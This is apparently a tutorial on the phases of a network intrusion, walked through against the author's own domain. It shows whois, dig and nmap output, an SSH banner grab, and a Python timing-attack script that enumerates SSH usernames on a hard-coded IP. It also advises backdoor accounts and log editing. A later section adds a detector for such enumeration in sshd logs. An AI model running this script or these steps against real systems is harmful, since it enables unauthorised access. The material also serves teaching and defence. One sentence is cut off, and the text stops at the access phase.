- A hacker can get his feet into a network via different techniques, and for different reasons. A network can be targeted by a hacker for whatever reason he has, in which case it is a target of choice, or it could be just a target of opportunity that he found by a random scan.
- “If a network is not a target of choice, it doesn't mean that it is safe, because it's just a matter of time until it becomes a target of opportunity.”
- Usually hackers will go through these well-known steps to gain access to a network:
- 1- Reconnaissance and foot/fingerprinting:- Reconnaissance is the first step of an attack, and this phase is mostly about information gathering: all the information the hacker can gather about the victim, even if it seems simple and useless. The hacker can collect this information in different ways, for example simple dumpster diving around the target's office, checking their staff's social network profiles, googling the target and noting the information he gets, or via social engineering. The footprinting process comes after to complete the step. Footprinting is mainly about studying the network, for example how devices are connected together, how many devices the network has, the infrastructure, firewalls, etc.
- “This phase depends on OSINT (open source intelligence), with no direct contact with the target.”
- 2- Scanning:- The attacker engages with the target for more specific details, for example open ports and running services. Let's say we find port 21 open; then with a simple telnet command we can figure out the FTP version running on the server.
- 3- Enumeration, gaining access and privilege escalation:- Three different processes. First, enumeration, which allows the hacker to find the valid accounts he wants to obtain access to via an active connection. For example, he knows from the above processes (reconnaissance, footprinting and scanning) that there is an SSH service running on the default port 22; by enumerating, the hacker can learn whether a user is valid or not via a simple python script. The next step is brute-forcing the valid account. If he succeeds in gaining access to the SSH server, he will then try privilege escalation if the brute-forced account doesn't have superuser power.
- 4- Creating a backdoor and covering tracks:- In this phase the hacker has already gained access, and he will install a rootkit or backdoor so he guarantees himself a free entrance to the network later on, for example by creating a new user and adding it to the sudo list. The last step is covering tracks by editing the logs to delete his traces from them.
- A hacker will never delete the logs outright, as that would get the network administrator's attention.
- A real-life example:
- Let's say a hacker would like to take over ashellz.com (it's owned by me). I will try to demonstrate the process step by step according to the above explanation.
- Reconnaissance and footprinting:-
- Using the whois command to collect public information about the target.
```text
root@Mox:/home/allamoox# whois ashellz.com
Registrant domain : Goddady.com
Tech Email: allamoox@hotmail.com
Name Server: NS8015.HOSTGATOR.COM
Name Server: NS8016.HOSTGATOR.COM
Tech Name: mahmoud allam
Tech Organization: aLLamoox
Tech Street: aol tarik shobar
Tech City: Tanta
Tech State/Province: gHARBIA
Tech Postal Code: 31111
Tech Country: EG
Tech Phone: +20.104691184
```
- Using dig with the switch any, to show all records.
```text
root@Mox:/home/allamoox# dig ashellz.com any
ashellz.com. 14385 IN A 192.185.16.67
ashellz.com. 86385 IN SOA ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com. 2016091826 86400 7200 3600000 86400
ashellz.com. 14385 IN MX 0 mail.ashellz.com.
ashellz.com. 14385 IN TXT "v=spf1 a mx include:websitewelcome.com ~all"
ashellz.com. 86385 IN NS ns8016.hostgator.com.
ashellz.com. 86385 IN NS ns8015.hostgator.com.
```
- Scanning:-
- We will use nmap with the switches -O to detect the OS and -sS so the connection closes before completing the three-way handshake (passive scan).
```text
root@Mox:/home/allamoox# nmap -O -sS ashellz.com
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
25/tcp filtered smtp
26/tcp open rsftp
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
2222/tcp open EtherNetIP-1
3306/tcp open mysql
8080/tcp open http-proxy
8443/tcp open https-alt
Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux 2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 - 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%)

root@Mox:/home/allamoox# telnet private.ashellz.com 22
Trying 158.69.197.45...
Connected to private.ashellz.com.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6
```
- Simple search will let us know that this
- Enumeration:-
- The hacker at this point has a good idea about the target and which parts are vulnerable, and he will start enumerating valid accounts for the SSH service via a timing attack technique.
- The technique here depends on the time that the server takes to authenticate a user, so we will use a 10 KB password, which means that if the user doesn't exist we will get an answer from the server faster than for an existing user.
- With this simple python script we will set our password to roughly 10 KB and enter the username we want to check manually.
```python
# Including the paramiko library
import paramiko
# Including the time library
import time

# Asking for the required username to be checked
user = input("user: ")
# Supplying the password as the letter A repeated 25000 times
p = 'A' * 25000
ssh = paramiko.SSHClient()
# time.time() replaces time.clock(), which was removed in Python 3.8
starttime = time.time()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    # Opening an SSH connection to the ashellz.com server with the chosen user
    # and the big 25000-letter password
    ssh.connect('192.185.16.67', username=user, password=p)
    # Giving the server time to authenticate the user
except Exception:
    endtime = time.time()
    total = endtime - starttime
    print(total)
```
- Now we get a few valid accounts such as (root, allamoox, allam, test).
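- On the defending side, every probe this script sends lands in the server's sshd auth log, and a burst of failed logins for many different usernames from one address is the signature of account enumeration or brute forcing. The detector below is an added example, not part of the original paste; its log lines are constructed for the demo, and the hostname, source addresses, log year and alert thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth log lines (not real logs); the usernames are the ones
# enumerated above, the source addresses are documentation ranges.
SAMPLE_LOG = """\
Sep 18 10:00:01 web sshd[2101]: Failed password for invalid user test from 203.0.113.5 port 51234 ssh2
Sep 18 10:00:03 web sshd[2103]: Invalid user allam from 203.0.113.5 port 51236
Sep 18 10:00:03 web sshd[2103]: Failed password for invalid user allam from 203.0.113.5 port 51236 ssh2
Sep 18 10:00:09 web sshd[2107]: Failed password for root from 203.0.113.5 port 51240 ssh2
Sep 18 10:00:15 web sshd[2110]: Failed password for allamoox from 203.0.113.5 port 51244 ssh2
Sep 18 10:03:40 web sshd[2150]: Failed password for allamoox from 198.51.100.7 port 40022 ssh2
Sep 18 10:05:02 web sshd[2160]: Accepted publickey for allamoox from 198.51.100.7 port 40030 ssh2
""".splitlines()

LOG_RE = re.compile(  # handles both "Invalid user X" and "Failed password for ..." lines
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: "
    r"(?:Failed password for (?:invalid user )?|Invalid user )"
    r"(?P<user>\S+) from (?P<ip>[\d.]+)"
)

def parse_line(line, year=2016):
    """Return (timestamp, user, source_ip) for a failed or invalid login, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog lines carry no year
    return ts, m["user"], m["ip"]

def detect_enumeration(lines, window_seconds=60, min_users=4):
    """Return {source_ip: sorted usernames} for sources trying >= min_users distinct names within window_seconds."""
    attempts = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, user, ip = parsed
            attempts[ip].append((ts, user))
    flagged = {}
    for ip, events in attempts.items():
        events.sort()
        start = 0
        for end in range(len(events)):   # sliding window over the sorted attempts
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            users = {u for _, u in events[start:end + 1]}
            if len(users) >= min_users:
                flagged[ip] = sorted(users)
                break
    return flagged
```

A single user failing once and then logging in with a key (the second address) is normal noise and is not flagged; four different names from one address inside fifteen seconds is.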
- Gaining access and privilege escalation:-